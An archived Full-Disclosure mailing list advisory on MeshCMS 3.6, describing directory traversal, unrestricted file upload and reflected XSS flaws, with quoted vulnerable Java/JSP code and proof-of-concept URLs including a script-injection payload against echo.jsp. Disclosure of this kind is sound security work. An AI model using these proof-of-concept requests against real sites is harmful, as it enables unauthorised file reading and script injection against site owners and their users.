| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 5 Apr 2016 09:02:28 +0800
From: xiong piaox <yahoo860201@...il.com>
To: Fulldisclosure@...lists.org
Subject: [FD] MeshCMS 3.6 – Multiple vulnerabilities
Exploit Title: MeshCMS 3.6 – Multiple vulnerabilities
Date: 2016-04-03
Exploit Author: piaox xiong(xiongyaofu351@...gan.com.cn)
Vendor Homepage: http://www.cromoteca.com/en/meshcms/
Software Link: http://www.cromoteca.com/en/meshcms/download/
Version: 3.6
Tested on: Windows OS
#############
Application Description:
MeshCMS is an online editing system written in Java. It provides a set of
features usually included in a CMS, but it uses a more traditional
approach: pages are stored in regular HTML files and all additional
features are file-based, without needing a database.
#############
Vulnerability Description:
1、Directory traversal Vulnerability
the servlet of DownloadServlet exist Directory traversal
String str = paramHttpServletRequest.getParameter("filename");
*if* (*Utils*.*isNullOrEmpty*(str)) {
str = localPath.*getLastElement*();
}
*try*
{
FileInputStream localFileInputStream = *new*
FileInputStream((File)localObject);
paramHttpServletResponse.setContentType("application/x-download");
paramHttpServletResponse.setHeader("Content-Disposition", "attachment;
filename=\"" + str + "\"");
paramHttpServletResponse.setHeader("Content-Length",
Long.toString(((File)localObject).length()));
*Utils*.*copyStream*(localFileInputStream,
paramHttpServletResponse.getOutputStream(), *false*);
}
POC:
http://127.0.0.1:8080/meshcms/servlet/org.meshcms.core.DownloadServlet/meshcms/admin/filemanager/upload1.jsp
http://127.0.0.1:8080/meshcms/servlet/org.meshcms.core.DownloadServlet/meshcms/admin/login.jsp
2、File Upload Vulnerability
the upload2.jsp don’t check the upload file’security.
try {
FileItem upItem = null;
ServletFileUpload upload = new ServletFileUpload(new
DiskFileItemFactory());
upload.setProgressListener(new
UploadProgressListener(request.getSession(true)));
List items = upload.parseRequest(request);
Iterator iter = items.iterator();
while (iter.hasNext()) {
FileItem item = (FileItem) iter.next();
if (item.getFieldName().equals("dir")) {
path = new Path(item.getString());
} else if (item.getFieldName().equals("fixname")) {
fixName = Utils.isTrue(item.getString());
} else if (item.getFieldName().equals("upfile") && item.getSize() >
0L) {
upItem = item;
}
}
if (upItem != null && path != null) {
String fileName = new Path(upItem.getName()).getLastElement();
if (fixName) {
fileName = Utils.generateUniqueName
(WebUtils.fixFileName(fileName, true), webSite.getFile(path));
}
ok = webSite.saveToFile(userInfo, upItem, path.add(fileName));
}
3、Non-Persistent XSS
In the meshcms/meshcms/admin/ directory echo.jsp file code is as
follows,exist Non-Persistent XSS
try {
response.resetBuffer();
} catch (IllegalStateException ex) {
//
}
response.getWriter().write(request.getParameter("fullsrc"));
%>
POC:
http://127.0.0.1:8080/meshcms/meshcms/admin/echo.jsp?fullsrc=%3Cscript%3Ealert%281%29%3C/script%3E
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists